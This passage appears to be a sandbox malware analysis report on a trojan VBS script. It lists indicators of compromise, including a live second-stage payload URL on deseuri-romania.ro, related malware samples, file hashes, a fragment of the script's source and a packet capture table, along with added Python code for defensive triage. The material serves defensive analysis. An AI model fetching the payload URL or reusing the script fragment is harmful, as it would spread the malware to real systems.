https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
https://aka.ms/pscore68 | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | true | false | | unknown
deseuri-romania.ro | 188.241.183.203 | true | false | | unknown
Horm5zl_6637.6637.6637.657e | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://deseuri-romania.ro/Bennington.jpb | false | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://deseuri-romania.ro | powershell.exe, 00000004.00000002.1484608451.000002D2D2D92000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB_q | powershell.exe, 00000006.00000002.2644976165.00000000044F1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://deseuri-romania.ro/Bennington.jpbXR0l | powershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000004.00000002.1484608451.000002D2D21BE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://deseuri-romania.ro | powershell.exe, 00000004.00000002.1484608451.000002D2D2A45000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1484608451.000002D2D0EC6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://deseuri-romania.ro/Bennington.jpbP | powershell.exe, 00000004.00000002.1484608451.000002D2D0EC6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000004.00000002.1518070240.000002D2E0D12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000006.00000002.2659683449.0000000005557000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1484608451.000002D2D0CA1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe |
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000004.00000002.1484608451.000002D2D0CA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2644976165.00000000044F1000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2644976165.0000000004647000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
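Most of the URLs carved from the powershell.exe memory dumps in the table above are not indicators for this sample. The nuget.org, contoso.com, pesterbdd.com, github.com/Pester, Apache licence, aka.ms/pscore6 and schemas.xmlsoap.org strings ship with stock PowerShell components (PowerShellGet and Pester manifests, PowerShell's own resources) and turn up in every powershell.exe dump; the report itself rates them "URL Reputation: safe". String carving also overruns into neighbouring bytes, which is why the payload URL appears three times with different tails (…jpb, …jpbXR0l, …jpbP) and why "https://go.micro" is cut short. The Python below is an added example, not code from Joe Sandbox or this report: it collapses carving overruns, separates boilerplate from sample-specific URLs and leaves the hosts worth blocking. The boilerplate prefix list and the four-character overrun limit are assumptions; the input list is copied from the table.

```python
from urllib.parse import urlsplit

# Prefixes of URLs that stock PowerShell components carry in their manifests and
# resources. Assumed boilerplate; extend it from memory dumps of a clean powershell.exe.
BOILERPLATE_PREFIXES = (
    "http://nuget.org/",
    "https://nuget.org/",
    "https://www.nuget.org/",
    "http://pesterbdd.com/",
    "https://github.com/Pester/",
    "http://www.apache.org/licenses/",
    "https://contoso.com/",
    "https://aka.ms/pscore6",
    "https://go.microsoft.com/",
    "http://schemas.xmlsoap.org/",
)

# The URLs listed in the report's memory-string table, copied as printed there.
REPORT_URLS = [
    "https://deseuri-romania.ro/Bennington.jpb",
    "http://nuget.org/NuGet.exe",
    "http://deseuri-romania.ro",
    "http://pesterbdd.com/images/Pester.png",
    "https://aka.ms/pscore6lB_q",
    "http://www.apache.org/licenses/LICENSE-2.0.html",
    "https://deseuri-romania.ro/Bennington.jpbXR0l",
    "https://go.micro",
    "https://deseuri-romania.ro",
    "https://deseuri-romania.ro/Bennington.jpbP",
    "https://contoso.com/",
    "https://nuget.org/nuget.exe",
    "https://contoso.com/License",
    "https://contoso.com/Icon",
    "https://aka.ms/pscore68",
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name",
    "https://github.com/Pester/Pester",
]


def is_boilerplate(url, min_len=12):
    """True if the URL starts with a boilerplate prefix, or is itself a truncated
    carve of one ('https://go.micro' stops inside 'https://go.microsoft.com/').
    min_len stops a bare scheme from matching everything."""
    return any(url.startswith(p) or (len(url) >= min_len and p.startswith(url))
               for p in BOILERPLATE_PREFIXES)


def collapse_overruns(urls, max_overrun=4):
    """Map each URL to a canonical form. A URL that extends a shorter URL from the
    same set by at most max_overrun trailing characters is treated as a carving
    overrun of that shorter URL (assumed heuristic)."""
    ordered = sorted(set(urls), key=len)
    canon = {}
    for u in ordered:
        base = u
        for shorter in ordered:
            if len(shorter) >= len(u):
                break                      # only strictly shorter strings can be prefixes
            if u.startswith(shorter) and len(u) - len(shorter) <= max_overrun:
                base = canon[shorter]      # follow chains: ...jpbP -> ...jpb
                break
        canon[u] = base
    return canon


def triage(urls):
    """Split carved URLs into boilerplate and sample-specific sets and list the
    hosts behind the sample-specific ones."""
    canon = collapse_overruns(urls)
    boilerplate, suspect = set(), set()
    for u in urls:
        c = canon[u]
        (boilerplate if is_boilerplate(c) else suspect).add(c)
    hosts = sorted({urlsplit(u).hostname for u in suspect if urlsplit(u).hostname})
    return {"boilerplate": sorted(boilerplate), "suspect": sorted(suspect), "hosts": hosts}


if __name__ == "__main__":
    result = triage(REPORT_URLS)
    print("sample-specific:", *result["suspect"], sep="\n  ")
    print("hosts:", ", ".join(result["hosts"]))
```

Run on the table above this leaves three sample-specific URLs, all on deseuri-romania.ro, and eleven boilerplate entries (contoso.com/Icon folds into contoso.com/). Anything that survives the boilerplate filter but is not explained by the sample's behaviour is a prompt to extend the prefix list from a clean baseline rather than to loosen the overrun limit.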
IP | Domain | Country | ASN | ASN Name | Malicious
188.241.183.203 | deseuri-romania.ro | Romania | 5588 | GTSCEGTSCentralEuropeAntelGermanyCZ | false
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1541193
                                    Start date and time:2024-10-24 15:06:05 +02:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 6m 28s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:12
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winVBS@9/7@2/1
                                    EGA Information:Failed
                                    HCA Information:
                                    • Successful, ratio: 74%
                                    • Number of executed functions: 44
                                    • Number of non-executed functions: 21
                                    Cookbook Comments:
                                    • Found application associated with file extension: .vbs
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                    • Excluded domains from analysis (whitelisted): azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 7608 because it is empty
                                    • Execution Graph export aborted for target powershell.exe, PID 7852 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                    • VT rate limit hit for: Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs
Time | Type | Description
09:07:08 | API Interceptor | 88x Sleep call for process: powershell.exe modified
                                    No context
Match: s-part-0017.t-0009.fb-t-msedge.net
Associated Sample Name / URL | Detection | Threat Name | Context
https://egift.activationshub.com/gift-card/view/8lPFUrjq1LGzg7JHwS8hJJRdL/ | malicious | Unknown | 13.107.253.45
From.S03E06.1080p.WEB.H264-SuccessfulCrab.mkv.zip | malicious | Xmrig | 13.107.253.45
https://1drv.ms/o/c/3e563d3fb2a98d1c/Emlo5KUbYYNEvKtIF-7SS0EBYSeT3hOOGuv_MbeT-n2y4g?e=HPjqUn | malicious | HtmlDropper | 13.107.253.45
https://railrent-railrent.powerappsportals.com/ | malicious | Unknown | 13.107.253.45
https://2007.filemail.com/api/file/get?filekey=58mKUrTMdlmzqkRvo0UdVa2TMjJTCQiSNv5rUBtsDQTNU0dM4JzppUJaOrP_mWxCym0k9l5xEDeaXunPsHq6frY8XZH_gnclw86MefA3bpAlGuDkr77-xSqrMOQIlMdW5cRjwoOSCWIlTwpC48cNKMMHhMKp&track=P8fpm4ry&pk_vid=8a8b18f03738ae4f17297703684d559d | malicious | HTMLPhisher | 13.107.253.45
attachment(1).eml | malicious | Unknown | 13.107.253.45
PO 635614 635613_CQDM.html | malicious | HTMLPhisher | 13.107.253.45
https://railrent-railrent.powerappsportals.com/ | malicious | Unknown | 13.107.253.45
1863415243647.exe | malicious | AgentTesla | 13.107.253.45
SecuriteInfo.com.W32.MSIL_Kryptik.KMZ.gen.Eldorado.27390.3879.exe | malicious | Remcos | 13.107.253.45
Match: GTSCEGTSCentralEuropeAntelGermanyCZ
Associated Sample Name / URL | Detection | Threat Name | Context
atH4SE3Oi6.elf | malicious | Mirai | 94.42.225.27
o2YUBeMZW6.elf | malicious | Mirai | 62.168.37.157
5tSAlF2WkT.elf | malicious | Mirai | 62.168.37.162
ai3eCONS9Q.elf | malicious | Mirai | 94.42.250.26
arm4.elf | malicious | Mirai | 157.25.81.90
byte.arm5.elf | malicious | Okiru | 212.38.198.222
O1CZjzItH1.vbs | malicious | GuLoader | 31.14.12.249
Stima IMP87654 per l'esportazione dell'ultimo trimestre.vbs | malicious | GuLoader | 188.241.183.45
la.bot.arm5.elf | malicious | Unknown | 193.85.134.61
M3Llib2vh3.elf | malicious | Mirai | 62.168.37.191
Match: 3b5074b1b5d032e5620f69f9f700ff0e
Associated Sample Name / URL | Detection | Threat Name | Context
kQyd2z80gD.exe | malicious | DCRat | 188.241.183.203
PO-Zam#U00f3wienie zakupu-8837837849-pl-.exe | malicious | DarkCloud | 188.241.183.203
https://www.yola.com/es/zendesk-sso?return_to=http://york.iwill.app.br/ | malicious | Unknown | 188.241.183.203
Produccion.exe | malicious | GuLoader, Snake Keylogger | 188.241.183.203
xVmySfWfcW.exe | malicious | Unknown | 188.241.183.203
226999705-124613-sanlccjavap0004-67.exe | malicious | Snake Keylogger | 188.241.183.203
LDlanZur0i.exe | malicious | Unknown | 188.241.183.203
Fa1QSXjTZD.exe | malicious | Unknown | 188.241.183.203
xxImTScxAq.exe | malicious | Unknown | 188.241.183.203
4aOgNkVU5z.exe | malicious | Unknown | 188.241.183.203
                                    No context
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:modified
                                    Size (bytes):8003
                                    Entropy (8bit):4.840877972214509
                                    Encrypted:false
                                    SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                    MD5:106D01F562D751E62B702803895E93E0
                                    SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                    SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                    SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllultnxj:NllU
                                    MD5:F93358E626551B46E6ED5A0A9D29BD51
                                    SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                    SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                    SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
                                    Malicious:false
                                    Reputation:moderate, very likely benign file
                                    Preview:@...e................................................@..........
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:dropped
                                    Size (bytes):60
                                    Entropy (8bit):4.038920595031593
                                    Encrypted:false
                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                    Malicious:false
                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):437608
                                    Entropy (8bit):5.852166561840111
                                    Encrypted:false
                                    SSDEEP:6144:xy0c0FyoE2e1LjGTD/DQMqO4UHABAVI/57bgsiIl2vY1dtJwD/Zc6YwvB2q04jZO:xc0L0GTDL5qvLWWgsLNdC68v08A4sR5j
                                    MD5:87CB39DFE342DFF1EAAD4F98568D8AC2
                                    SHA1:01DECB2CE6352B9BC94819F25C2A2529F4F432F8
                                    SHA-256:250ED83843CA423C4FD9C6BC72B1A975DCDD8CCFD6327F5313B7852F6DD673A4
                                    SHA-512:2FA721A23FFFD36CDC7C5596038A8CECD67B40601CECC411788169A5B2844C10B339F7453A48CD31A70E3C2BED09687EED52E55A0641B2FC8EDF870F7C3B118B
                                    Malicious:false
Preview:
                                    File type:ASCII text, with CRLF line terminators
                                    Entropy (8bit):5.0897597264876655
                                    TrID:
                                    • Visual Basic Script (13500/0) 100.00%
                                    File name:Szacunek IMP29575 za eksport z ostatniego kwartalu.vbs
                                    File size:156'919 bytes
                                    MD5:740d51a6d22d43f1b99e61c9d3366237
                                    SHA1:712c28e59ff11135e1957f86d8e6a995ad772de6
                                    SHA256:e301c6308fff6e0e1d3e399a2ad2eb623f2f36590ff60766d16efbe6f4c154dc
                                    SHA512:be9ca0b1f9f8a375b3cf0c8d93fb2458a23a5e3a4db2545c3b7eea4f1e33e5d7e4c8ead86976a4d0ee121d4a7ad4c33da18bfeeb4e3345e384e5f63f53902fa2
                                    SSDEEP:3072:aiHtveXendAy3yrLRKm+ay3tJuj8Sq2qb0M240PCOLvAtK3qfBHqn5r4f6:aiHtveXendAy3yrslay3tJuj8Sq2qb0Z
                                    TLSH:43E373D3CAD5AA989A955AB3DD1357370DB0026C37231F7443BEC98D605398889BFBC8
                                    File Content Preview:......Set Skovarbejde = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")....Set Forandringsprogrammer = Skovarbejde.ExecQuery("Select * from Win32_Process Where Name = 'cracking.exe'")....For Each bajonetlaasens in Forandringsprogramm
                                    Icon Hash:68d69b8f86ab9a86
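The packet timeline that follows is a single session from the sandbox VM (192.168.2.11, ephemeral port 49737) to 188.241.183.203 on port 443, the host the IP table resolves for deseuri-romania.ro, starting 65 seconds after the analysis began at 15:06:05. When this table is copied out of the report as plain text the five columns run together, so a row reads `Oct 24, 2024 15:07:10.685431004 CEST49737443192.168.2.11188.241.183.203`, and a naive regex has no way to choose between `49737|443` and `4973|7443`, or between `192.168.2.11|188.241.183.203` and `192.168.2.111|88.241.183.203`. The Python below is an added example and not code from Joe Sandbox or this report: it enumerates every syntactically valid split of such a row, keeps the one reading consistent with the report (one RFC 1918 end, the other end listed in the report's IP table, one ephemeral and one service port) and summarises the session. The six sample rows are the first six rows of the table below; the Windows ephemeral range and the private-address rule are assumptions, and a row with zero or several consistent readings is rejected rather than guessed.

```python
import re
from datetime import datetime
from ipaddress import ip_address

# Remote hosts the report attributes to the sample (from its IP table). Used to
# decide where one address ends and the next begins.
KNOWN_REMOTE = {"188.241.183.203"}

# The first six rows of the report's packet table as a plain-text copy renders them:
# timestamp, zone, then source port, destination port, source IP, destination IP
# with no separators.
SAMPLE_ROWS = [
    "Oct 24, 2024 15:07:10.685431004 CEST49737443192.168.2.11188.241.183.203",
    "Oct 24, 2024 15:07:10.685461998 CEST44349737188.241.183.203192.168.2.11",
    "Oct 24, 2024 15:07:10.685574055 CEST49737443192.168.2.11188.241.183.203",
    "Oct 24, 2024 15:07:10.695858002 CEST49737443192.168.2.11188.241.183.203",
    "Oct 24, 2024 15:07:10.695871115 CEST44349737188.241.183.203192.168.2.11",
    "Oct 24, 2024 15:07:11.603245974 CEST44349737188.241.183.203192.168.2.11",
]

ROW_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+) "
                    r"(?P<tz>[A-Z]+)(?P<rest>[\d.]+)$")


def _valid_port(s):
    return s.isdigit() and (len(s) == 1 or s[0] != "0") and 1 <= int(s) <= 65535


def _valid_octet(s):
    return s.isdigit() and (len(s) == 1 or s[0] != "0") and int(s) <= 255


def _parse_ts(s):
    # strptime stops at microseconds; the report prints nanoseconds, so truncate.
    head, frac = s.rsplit(".", 1)
    return datetime.strptime(head, "%b %d, %Y %H:%M:%S").replace(
        microsecond=int(frac[:6].ljust(6, "0")))


def split_candidates(rest):
    """Every syntactically valid (sport, dport, src, dst) reading of the digit run.
    It has seven dot-separated groups: the first holds both ports plus the first
    octet of src, the fourth holds the last octet of src plus the first of dst."""
    groups = rest.split(".")
    if len(groups) != 7:
        return []
    d0, d1, d2, d3, d4, d5, d6 = groups
    out = []
    for i in range(1, 6):                       # source port: 1-5 digits
        for j in range(1, 6):                   # destination port: 1-5 digits
            sport, dport, o1 = d0[:i], d0[i:i + j], d0[i + j:]
            if not 1 <= len(o1) <= 3:
                continue
            for k in range(1, 4):               # last octet of src: 1-3 digits
                src = f"{o1}.{d1}.{d2}.{d3[:k]}"
                dst = f"{d3[k:]}.{d4}.{d5}.{d6}"
                if (_valid_port(sport) and _valid_port(dport)
                        and all(_valid_octet(o) for o in src.split(".") + dst.split("."))):
                    out.append((int(sport), int(dport), src, dst))
    return out


def parse_row(line, known_remote=KNOWN_REMOTE):
    """Return (timestamp, sport, dport, src, dst); raise ValueError unless exactly
    one reading of the row is consistent with the report."""
    m = ROW_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised row: {line!r}")

    def plausible(c):
        sport, dport, src, dst = c
        ends = {src, dst}
        private = [ip for ip in ends if ip_address(ip).is_private]
        # Assumptions: one end is the sandbox VM (RFC 1918), the other is a host the
        # report lists, and one port is a Windows ephemeral port (>= 49152) while the
        # other is a service port (< 1024).
        if len(private) != 1 or not (ends & known_remote):
            return False
        return (sport >= 49152 and dport < 1024) or (dport >= 49152 and sport < 1024)

    readings = [c for c in split_candidates(m["rest"]) if plausible(c)]
    if len(readings) != 1:
        raise ValueError(f"{len(readings)} consistent readings for row: {line!r}")
    sport, dport, src, dst = readings[0]
    return _parse_ts(m["ts"]), sport, dport, src, dst


def summarize(rows, known_remote=KNOWN_REMOTE):
    """Group packets into sessions keyed (client, client_port, server, server_port)
    with first/last timestamps and per-direction packet counts."""
    sessions = {}
    for row in rows:
        ts, sport, dport, src, dst = parse_row(row, known_remote)
        if ip_address(src).is_private:
            key, direction = (src, sport, dst, dport), "client_to_server"
        else:
            key, direction = (dst, dport, src, sport), "server_to_client"
        s = sessions.setdefault(key, {"first": ts, "last": ts,
                                      "client_to_server": 0, "server_to_client": 0})
        s["first"], s["last"] = min(s["first"], ts), max(s["last"], ts)
        s[direction] += 1
    return sessions


if __name__ == "__main__":
    for (client, cport, server, sport), s in summarize(SAMPLE_ROWS).items():
        print(f"{client}:{cport} -> {server}:{sport}  {s['first']} .. {s['last']}  "
              f"c2s={s['client_to_server']} s2c={s['server_to_client']}")
```

The enumeration is what makes this safe to automate: the greedy regex reading `192.168.2.111 / 88.241.183.203` is a valid IPv4 pair and passes a private-address check on its own, and is only rejected because 88.241.183.203 is not a host the report lists. Feed the whole table in and the session bounds give the time window for the TLS exchange that fetched the second stage; feed in rows from a report whose IP table you have not copied into KNOWN_REMOTE and the parser refuses rather than returning a wrong tuple.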
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 15:07:10.685431004 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:10.685461998 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:10.685574055 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:10.695858002 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:10.695871115 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:11.603245974 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:11.603347063 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:11.607064962 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:11.607079029 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:11.607383966 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:11.617750883 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:11.659332991 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:11.891422987 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:11.939091921 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.036277056 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.036289930 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.036320925 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.036333084 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.036358118 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.036427021 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.036427021 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.036442041 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.036595106 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.038382053 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.038397074 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.038552046 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.038562059 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.038625956 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.183765888 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.183784962 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.183906078 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.183916092 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.184055090 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.184783936 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.184801102 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.184875011 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
Oct 24, 2024 15:07:12.184884071 CEST | 443 | 49737 | 188.241.183.203 | 192.168.2.11
Oct 24, 2024 15:07:12.184943914 CEST | 49737 | 443 | 192.168.2.11 | 188.241.183.203
